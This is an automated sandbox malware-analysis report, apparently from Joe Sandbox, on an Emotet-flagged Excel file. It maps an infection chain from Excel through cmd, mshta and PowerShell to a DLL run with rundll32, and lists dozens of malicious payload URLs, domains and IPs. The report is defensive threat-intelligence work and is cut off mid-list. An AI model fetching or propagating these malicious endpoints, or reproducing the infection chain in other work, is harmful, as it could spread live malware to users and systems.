                            Source: Yara matchFile source: 0000000D.00000002.621014524.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.620852430.0000000002ED1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.620492443.0000000002730000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.679074321.0000000000940000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.619980737.0000000000360000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.561230347.00000000022F1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.620621291.0000000002870000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: C:\ProgramData\JooSee.dll, type: DROPPED

                            Mitre Att&ck Matrix

                            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                            Valid Accounts21
                            Scripting                            		1
                            Windows Service                            		1
                            Windows Service                            		1
                            Disable or Modify Tools                            		1
                            Input Capture                            		2
                            System Time Discovery                            		Remote Services1
                            Archive Collected Data                            		Exfiltration Over Other Network Medium13
                            Ingress Tool Transfer                            		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                            Default Accounts1
                            Native API                            		Boot or Logon Initialization Scripts11
                            Process Injection                            		1
                            Deobfuscate/Decode Files or Information                            		LSASS Memory3
                            File and Directory Discovery                            		Remote Desktop Protocol1
                            Email Collection                            		Exfiltration Over Bluetooth1
                            Encrypted Channel                            		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                            Domain Accounts13
                            Exploitation for Client Execution                            		Logon Script (Windows)Logon Script (Windows)21
                            Scripting                            		Security Account Manager38
                            System Information Discovery                            		SMB/Windows Admin Shares1
                            Input Capture                            		Automated Exfiltration2
                            Non-Application Layer Protocol                            		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                            Local Accounts11
                            Command and Scripting Interpreter                            		Logon Script (Mac)Logon Script (Mac)2
                            Obfuscated Files or Information                            		NTDS21
                            Security Software Discovery                            		Distributed Component Object Model1
                            Clipboard Data                            		Scheduled Transfer122
                            Application Layer Protocol                            		SIM Card SwapCarrier Billing Fraud
                            Cloud Accounts1
                            Service Execution                            		Network Logon ScriptNetwork Logon Script2
                            Masquerading                            		LSA Secrets1
                            Virtualization/Sandbox Evasion                            		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                            Replication Through Removable Media1
                            PowerShell                            		Rc.commonRc.common1
                            Virtualization/Sandbox Evasion                            		Cached Domain Credentials1
                            Process Discovery                            		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                            External Remote ServicesScheduled TaskStartup ItemsStartup Items11
                            Process Injection                            		DCSync1
                            Application Window Discovery                            		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                            Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
                            Hidden Files and Directories                            		Proc Filesystem1
                            Remote System Discovery                            		Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                            Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)1
                            Rundll32                            		/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

                            Behavior Graph

                            Hide Legend

                            Legend:

                            • Process
                            • Signature
                            • Created File
                            • DNS/IP Info
                            • Is Dropped
                            • Is Windows Process
                            • Number of created Registry Values
                            • Number of created Files
                            • Visual Basic
                            • Delphi
                            • Java
                            • .Net C# or VB.NET
                            • C, C++ or other language
                            • Is malicious
                            • Internet
                            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 562418 Sample: CJ68000754184.xls Startdate: 28/01/2022 Architecture: WINDOWS Score: 100 49 129.232.188.93 xneeloZA South Africa 2->49 51 162.214.50.39 UNIFIEDLAYER-AS-1US United States 2->51 53 43 other IPs or domains 2->53 63 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->63 65 Multi AV Scanner detection for domain / URL 2->65 67 Found malware configuration 2->67 69 16 other signatures 2->69 15 EXCEL.EXE 53 12 2->15         started        signatures3 process4 file5 47 C:\Users\user\Desktop\CJ68000754184.xls, Composite 15->47 dropped 18 cmd.exe 15->18         started        process6 process7 20 mshta.exe 11 18->20         started        dnsIp8 55 91.240.118.172, 49167, 49168, 80 GLOBALLAYERNL unknown 20->55 23 powershell.exe 12 7 20->23         started        process9 dnsIp10 57 hostfeeling.com 164.90.147.135, 80 DIGITALOCEAN-ASNUS United States 23->57 59 jurnalpjf.lan.go.id 103.206.244.105, 49170, 80 CEPATNET-AS-IDPTMoraTelematikaIndonesiaID Indonesia 23->59 45 C:\ProgramData\JooSee.dll, PE32 23->45 dropped 73 Powershell drops PE file 23->73 28 cmd.exe 23->28         started        file11 signatures12 process13 process14 30 rundll32.exe 28->30         started        process15 32 rundll32.exe 1 30->32         started        file16 43 C:\Windows\...\wpnzacwyitgbmx.rxn (copy), PE32 32->43 dropped 61 Hides that the sample has been downloaded from the Internet (zone.identifier) 32->61 36 rundll32.exe 32->36         started        signatures17 process18 process19 38 rundll32.exe 1 36->38         started        signatures20 71 Hides that the sample has been downloaded from the Internet (zone.identifier) 38->71 41 rundll32.exe 38->41         started        process21

                            Screenshots

                            Thumbnails

                            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                            windows-stand

                            Antivirus, Machine Learning and Genetic Malware Detection

                            Initial Sample

                            SourceDetectionScannerLabelLink
                            CJ68000754184.xls13%VirustotalBrowse
                            CJ68000754184.xls19%ReversingLabsDocument-Excel.Trojan.Emotet

                            Dropped Files

                            SourceDetectionScannerLabelLink
                            C:\ProgramData\JooSee.dll100%Joe Sandbox ML

                            Unpacked PE Files

                            SourceDetectionScannerLabelLinkDownload
                            10.2.rundll32.exe.340000.0.unpack100%AviraHEUR/AGEN.1145233Download File
                            12.2.rundll32.exe.1b0000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            13.2.rundll32.exe.2ed0000.11.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            13.2.rundll32.exe.3110000.13.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            15.2.rundll32.exe.4b0000.3.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            10.2.rundll32.exe.2870000.9.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            9.2.rundll32.exe.250000.0.unpack100%AviraHEUR/AGEN.1145233Download File
                            10.2.rundll32.exe.2100000.3.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            15.2.rundll32.exe.970000.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            14.2.rundll32.exe.2d0000.0.unpack100%AviraHEUR/AGEN.1145233Download File
                            10.2.rundll32.exe.3180000.13.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            12.2.rundll32.exe.180000.0.unpack100%AviraHEUR/AGEN.1145233Download File
                            15.2.rundll32.exe.29e0000.9.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            10.2.rundll32.exe.2130000.4.unpack100%AviraHEUR/AGEN.1145233Download File
                            15.2.rundll32.exe.2e40000.10.unpack100%AviraHEUR/AGEN.1145233Download File
                            10.2.rundll32.exe.23a0000.7.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            10.2.rundll32.exe.2370000.6.unpack100%AviraHEUR/AGEN.1145233Download File
                            10.2.rundll32.exe.2e10000.11.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            15.2.rundll32.exe.3f0000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            14.2.rundll32.exe.300000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            13.2.rundll32.exe.220000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            13.2.rundll32.exe.2870000.8.unpack100%AviraHEUR/AGEN.1145233Download File
                            9.2.rundll32.exe.680000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            15.2.rundll32.exe.2790000.7.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            13.2.rundll32.exe.4b0000.4.unpack100%AviraHEUR/AGEN.1145233Download File
                            15.2.rundll32.exe.480000.2.unpack100%AviraHEUR/AGEN.1145233Download File
                            10.2.rundll32.exe.2de0000.10.unpack100%AviraHEUR/AGEN.1145233Download File
                            13.2.rundll32.exe.390000.3.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            10.2.rundll32.exe.2410000.8.unpack100%AviraHEUR/AGEN.1145233Download File
                            13.2.rundll32.exe.2650000.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            10.2.rundll32.exe.370000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            15.2.rundll32.exe.2e70000.11.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            13.2.rundll32.exe.28e0000.9.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            15.2.rundll32.exe.2920000.8.unpack100%AviraHEUR/AGEN.1145233Download File
                            13.2.rundll32.exe.1b0000.0.unpack100%AviraHEUR/AGEN.1145233Download File
                            15.2.rundll32.exe.a00000.6.unpack100%AviraHEUR/AGEN.1145233Download File
                            13.2.rundll32.exe.2910000.10.unpack100%AviraHEUR/AGEN.1145233Download File
                            13.2.rundll32.exe.27b0000.7.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            10.2.rundll32.exe.4a0000.2.unpack100%AviraHEUR/AGEN.1145233Download File
                            15.2.rundll32.exe.2c0000.0.unpack100%AviraHEUR/AGEN.1145233Download File
                            13.2.rundll32.exe.2730000.6.unpack100%AviraHEUR/AGEN.1145233Download File
                            13.2.rundll32.exe.360000.2.unpack100%AviraHEUR/AGEN.1145233Download File
                            13.2.rundll32.exe.30e0000.12.unpack100%AviraHEUR/AGEN.1145233Download File
                            10.2.rundll32.exe.3110000.12.unpack100%AviraHEUR/AGEN.1145233Download File
                            10.2.rundll32.exe.22f0000.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            15.2.rundll32.exe.940000.4.unpack100%AviraHEUR/AGEN.1145233Download File

                            Domains

                            SourceDetectionScannerLabelLink
                            hostfeeling.com11%VirustotalBrowse
                            jurnalpjf.lan.go.id1%VirustotalBrowse

                            URLs

                            SourceDetectionScannerLabelLink
                            http://maxtdeveloper.com/okw9yx/100%Avira URL Cloudmalware
                            http://gardeningfilm.com/wp-content/pcMVUYDQ3q/100%Avira URL Cloudmalware
                            http://it-o.biz/bitrix/xoDdDe/PE3100%Avira URL Cloudmalware
                            http://www.inablr.com/elenctic/f100%Avira URL Cloudmalware
                            http://totalplaytuxtla.com/sitio/DgktL3zd/PE3100%Avira URL Cloudmalware
                            http://hostfeeling.com/wp-admin/100%Avira URL Cloudmalware
                            http://gardeningfilm.com/wp-content/pcMVUYDQ3q/PE3100%Avira URL Cloudmalware
                            http://www.protware.com/ll0%Avira URL Cloudsafe
                            https://property-eg.com/mlzkir/97v/100%Avira URL Cloudmalware
                            http://91.240.110%URL Reputationsafe
                            http://91.240.118.172/gg/ff/fe.png100%Avira URL Cloudmalware
                            http://91.240.118.172/gg/ff/fe.pngPE30%Avira URL Cloudsafe
                            http://www.protware.com/0%URL Reputationsafe
                            http://jurnalpjf.lan.go.id/asset0%Avira URL Cloudsafe
                            http://maxtdeveloper.com/okw9yx/Gc28ZX/PE3100%Avira URL Cloudmalware
                            http://bimesarayenovin.ir/wp-adm100%Avira URL Cloudmalware
                            http://hostfeeling.com/wp-admin/4XsjtOT7cFHvBV3HZ/100%Avira URL Cloudmalware
                            http://91.240.118.172/gg/ff/fe.htmlhttp://91.240.118.172/gg/ff/fe.html0%Avira URL Cloudsafe
                            http://www.inablr.com/elenctic/fMFtRrbsEX1gXu3Z1M/100%Avira URL Cloudmalware
                            http://hostfeeling.com100%Avira URL Cloudmalware
                            http://daisy.sukoburu-secure.com100%Avira URL Cloudmalware
                            http://it-o.biz/0%Avira URL Cloudsafe
                            http://jurnalpjf.lan.go.id/assets/iM/100%Avira URL Cloudmalware
                            http://activetraining.sytes.net/100%Avira URL Cloudmalware
                            http://www.inablr.com/elenctic/fMFtRrbsEX1gXu3Z1M/PE3100%Avira URL Cloudmalware
                            https://gudangtasorichina.com/wp-content/GG01c/PE3100%Avira URL Cloudmalware
                            https://gudangtasorichina.com/wp0%Avira URL Cloudsafe
                            http://daisy.suk0%Avira URL Cloudsafe
                            http://91.240.118.172/gg/ff/fe.htmlngs0%Avira URL Cloudsafe
                            http://91.240.118.172/gg/ff/fe.htmlb0%Avira URL Cloudsafe
                            http://91.240.118.172/gg/ff/fe.htmld0%Avira URL Cloudsafe
                            http://91.240.118.172/gg/ff/fe.htmlmshta0%Avira URL Cloudsafe
                            http://91.240.118.172/gg/ff/fe.htmlWinSta00%Avira URL Cloudsafe
                            http://91.240.118.172/gg/ff/fe.html_0%Avira URL Cloudsafe
                            http://hostfeeling.com/wp-admin/4XsjtOT7cFHvBV3HZ/PE3100%Avira URL Cloudmalware
                            https://property-eg.com/mlzkir/97v/PE3100%Avira URL Cloudmalware
                            http://daisy.sukoburu-secure.com/8plks/v8lyZTe/100%Avira URL Cloudmalware
                            https://property-eg.com/mlzkir/9100%Avira URL Cloudmalware
                            http://91.240.118.1720%Avira URL Cloudsafe
                            http://91.240.118.172/gg/ff/fe.htmll0%Avira URL Cloudsafe
                            http://jurnalpjf.lan.go.id0%Avira URL Cloudsafe
                            http://www.protware.com0%URL Reputationsafe
                            http://www.protware.comP0%Avira URL Cloudsafe
                            http://activetraining.sytes.net/libraries/8s/PE3100%Avira URL Cloudmalware
                            http://91.240.118.172/gg/ff/fe.htmlfunction0%Avira URL Cloudsafe
                            http://totalplaytuxtla.com/sitio0%Avira URL Cloudsafe
                            http://maxtdeveloper.com/okw9yx/Gc28ZX/100%Avira URL Cloudmalware
                            http://it-o.biz/bitrix/xoDdDe/100%Avira URL Cloudmalware
                            https://gudangtasorichina.com/wp-content/GG01c/100%Avira URL Cloudmalware
                            http://totalplaytuxtla.com/sitio/DgktL3zd/100%Avira URL Cloudmalware
                            http://activetraining.sytes.net/libraries/8s/100%Avira URL Cloudmalware
                            http://91.240.118.172/gg/ff/fe.p0%Avira URL Cloudsafe
                            http://gardeningfilm.com/wp-cont100%Avira URL Cloudmalware
                            http://jurnalpjf.lan.go.id/assets/iM/PE3100%Avira URL Cloudmalware
                            http://www.protware.com/r0%Avira URL Cloudsafe
                            http://bimesarayenovin.ir/wp-admin/G1pYGL/PE3100%Avira URL Cloudmalware
                            http://bimesarayenovin.ir/wp-admin/G1pYGL/100%Avira URL Cloudmalware
                            http://daisy.sukoburu-secure.com/8plks/v8lyZTe/PE3100%Avira URL Cloudmalware
                            http://91.240.118.172/gg/ff/fe.html100%Avira URL Cloudmalware

                            Domains and IPs

                            Contacted Domains

                            NameIPActiveMaliciousAntivirus DetectionReputation
                            hostfeeling.com
                            		164.90.147.135
                            		truetrueunknown
                            jurnalpjf.lan.go.id
                            		103.206.244.105
                            		truefalseunknown

                            Contacted URLs

                            NameMaliciousAntivirus DetectionReputation
                            http://91.240.118.172/gg/ff/fe.pngtrue
                            • Avira URL Cloud: malware
                            		unknown
                            http://jurnalpjf.lan.go.id/assets/iM/true
                            • Avira URL Cloud: malware
                            		unknown
                            http://91.240.118.172/gg/ff/fe.htmltrue
                            • Avira URL Cloud: malware
                            		unknown

                            URLs from Memory and Binaries

                            NameSourceMaliciousAntivirus DetectionReputation
                            http://maxtdeveloper.com/okw9yx/powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            		unknown
                            http://gardeningfilm.com/wp-content/pcMVUYDQ3q/powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            		unknown
                            http://it-o.biz/bitrix/xoDdDe/PE3powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            		unknown
                            http://www.inablr.com/elenctic/fpowershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            		unknown
                            http://totalplaytuxtla.com/sitio/DgktL3zd/PE3powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            		unknown
                            http://hostfeeling.com/wp-admin/powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            		unknown
                            http://gardeningfilm.com/wp-content/pcMVUYDQ3q/PE3powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            		unknown
                            http://www.protware.com/llmshta.exe, 00000004.00000003.441443397.0000000003AAE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.420217264.0000000003AAE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.446302477.0000000003AAE000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://property-eg.com/mlzkir/97v/powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            		unknown
                            http://91.240.11powershell.exe, 00000006.00000002.684983623.000000000362E000.00000004.00000800.00020000.00000000.sdmptrue
                            • URL Reputation: safe
                            		low
                            http://91.240.118.172/gg/ff/fe.pngPE3powershell.exe, 00000006.00000002.684983623.000000000362E000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.protware.com/mshta.exe, 00000004.00000002.446348661.0000000003CAA000.00000004.00000010.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://jurnalpjf.lan.go.id/assetpowershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://maxtdeveloper.com/okw9yx/Gc28ZX/PE3powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            		unknown
                            http://bimesarayenovin.ir/wp-admpowershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            		unknown
                            http://hostfeeling.com/wp-admin/4XsjtOT7cFHvBV3HZ/powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            		unknown
                            http://91.240.118.172/gg/ff/fe.htmlhttp://91.240.118.172/gg/ff/fe.htmlmshta.exe, 00000004.00000003.422456833.00000000032D5000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.inablr.com/elenctic/fMFtRrbsEX1gXu3Z1M/powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            		unknown
                            http://hostfeeling.compowershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            		unknown
                            http://daisy.sukoburu-secure.compowershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            		unknown
                            http://it-o.biz/powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://activetraining.sytes.net/powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            		unknown
                            http://www.inablr.com/elenctic/fMFtRrbsEX1gXu3Z1M/PE3powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            		unknown
                            https://gudangtasorichina.com/wp-content/GG01c/PE3powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            		unknown
                            https://gudangtasorichina.com/wppowershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://daisy.sukpowershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://91.240.118.172/gg/ff/fe.htmlngsmshta.exe, 00000004.00000002.445509209.00000000002BB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.443936246.00000000002B6000.00000004.00000020.00020000.00000000.sdmptrue
                            • Avira URL Cloud: safe
                            		unknown
                            http://91.240.118.172/gg/ff/fe.htmlbmshta.exe, 00000004.00000002.445492110.000000000029E000.00000004.00000020.00020000.00000000.sdmptrue
                            • Avira URL Cloud: safe
                            		unknown
                            http://91.240.118.172/gg/ff/fe.htmldmshta.exe, 00000004.00000003.420330399.00000000002E0000.00000004.00000020.00020000.00000000.sdmptrue
                            • Avira URL Cloud: safe
                            		unknown
                            http://91.240.118.172/gg/ff/fe.htmlmshtamshta.exe, 00000004.00000002.445452336.0000000000260000.00000004.00000020.00020000.00000000.sdmptrue
                            • Avira URL Cloud: safe
                            		unknown
                            http://91.240.118.172/gg/ff/fe.htmlWinSta0mshta.exe, 00000004.00000002.445452336.0000000000260000.00000004.00000020.00020000.00000000.sdmptrue
                            • Avira URL Cloud: safe
                            		unknown
                            http://91.240.118.172/gg/ff/fe.html_mshta.exe, 00000004.00000002.445492110.000000000029E000.00000004.00000020.00020000.00000000.sdmptrue
                            • Avira URL Cloud: safe
                            		unknown
                            http://hostfeeling.com/wp-admin/4XsjtOT7cFHvBV3HZ/PE3powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            		unknown
                            https://property-eg.com/mlzkir/97v/PE3powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            		unknown
                            http://daisy.sukoburu-secure.com/8plks/v8lyZTe/powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            		unknown
                            https://property-eg.com/mlzkir/9powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            		unknown
                            http://91.240.118.172powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.684983623.000000000362E000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: safe
                            		unknown
                            http://91.240.118.172/gg/ff/fe.htmllmshta.exe, 00000004.00000002.446063365.00000000039DB000.00000004.00000020.00020000.00000000.sdmptrue
                            • Avira URL Cloud: safe
                            		unknown
                            http://jurnalpjf.lan.go.idpowershell.exe, 00000006.00000002.685196853.00000000037CA000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.protware.commshta.exe, 00000004.00000003.420738023.0000000003A2C000.00000004.00000020.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.protware.comPmshta.exe, 00000004.00000003.420287820.0000000003A31000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://activetraining.sytes.net/libraries/8s/PE3powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            		unknown
                            http://91.240.118.172/gg/ff/fe.htmlfunctionmshta.exe, 00000004.00000003.423260829.00000000032DD000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: safe
                            		unknown
                            http://totalplaytuxtla.com/sitiopowershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://maxtdeveloper.com/okw9yx/Gc28ZX/powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            		unknown
                            http://it-o.biz/bitrix/xoDdDe/powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            		unknown
                            http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanervpowershell.exe, 00000006.00000002.677562211.00000000002AE000.00000004.00000020.00020000.00000000.sdmpfalse
                              		high
                              https://gudangtasorichina.com/wp-content/GG01c/powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmptrue
                              • Avira URL Cloud: malware
                              		unknown
                              http://totalplaytuxtla.com/sitio/DgktL3zd/powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmptrue
                              • Avira URL Cloud: malware
                              		unknown
                              http://activetraining.sytes.net/libraries/8s/powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmptrue
                              • Avira URL Cloud: malware
                              		unknown
                              http://91.240.118.172/gg/ff/fe.ppowershell.exe, 00000006.00000002.684983623.000000000362E000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://gardeningfilm.com/wp-contpowershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmptrue
                              • Avira URL Cloud: malware
                              		unknown
                              http://jurnalpjf.lan.go.id/assets/iM/PE3powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmptrue
                              • Avira URL Cloud: malware
                              		unknown
                              http://91.240.118.172/gg/ff/fe.htmlBCJ68000754184.xls.0.drtrue
                                		unknown
                                http://www.piriform.com/ccleanerpowershell.exe, 00000006.00000002.677562211.00000000002AE000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		high
                                  http://www.protware.com/rmshta.exe, 00000004.00000003.441588224.0000000003A9D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.446294886.0000000003A9D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.420167396.0000000003A9D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.443804667.0000000003A9D000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://bimesarayenovin.ir/wp-admin/G1pYGL/PE3powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmptrue
                                  • Avira URL Cloud: malware
                                  		unknown
                                  http://bimesarayenovin.ir/wp-admin/G1pYGL/powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmptrue
                                  • Avira URL Cloud: malware
                                  		unknown
                                  http://daisy.sukoburu-secure.com/8plks/v8lyZTe/PE3powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmptrue
                                  • Avira URL Cloud: malware
                                  		unknown
                                  http://www.piriform.com/ccleanerhttp://wpowershell.exe, 00000006.00000002.677314579.0000000000260000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		high

                                    World Map of Contacted IPs

                                    • No. of IPs < 25%
                                    • 25% < No. of IPs < 50%
                                    • 50% < No. of IPs < 75%
                                    • 75% < No. of IPs

                                    Public IPs

                                    IPDomainCountryFlagASNASN NameMalicious
                                    195.154.133.20
                                    		unknownFrance
                                    		12876OnlineSASFRtrue
                                    185.157.82.211
                                    		unknownPoland
                                    		42927S-NET-ASPLtrue
                                    212.237.17.99
                                    		unknownItaly
                                    		31034ARUBA-ASNITtrue
                                    79.172.212.216
                                    		unknownHungary
                                    		61998SZERVERPLEXHUtrue
                                    110.232.117.186
                                    		unknownAustralia
                                    		56038RACKCORP-APRackCorpAUtrue
                                    173.214.173.220
                                    		unknownUnited States
                                    		19318IS-AS-1UStrue
                                    212.24.98.99
                                    		unknownLithuania
                                    		62282RACKRAYUABRakrejusLTtrue
                                    138.185.72.26
                                    		unknownBrazil
                                    		264343EmpasoftLtdaMeBRtrue
                                    178.63.25.185
                                    		unknownGermany
                                    		24940HETZNER-ASDEtrue
                                    160.16.102.168
                                    		unknownJapan9370SAKURA-BSAKURAInternetIncJPtrue
                                    81.0.236.90
                                    		unknownCzech Republic
                                    		15685CASABLANCA-ASInternetCollocationProviderCZtrue
                                    103.75.201.2
                                    		unknownThailand
                                    		133496CDNPLUSCOLTD-AS-APCDNPLUSCOLTDTHtrue
                                    216.158.226.206
                                    		unknownUnited States
                                    		19318IS-AS-1UStrue
                                    45.118.115.99
                                    		unknownIndonesia
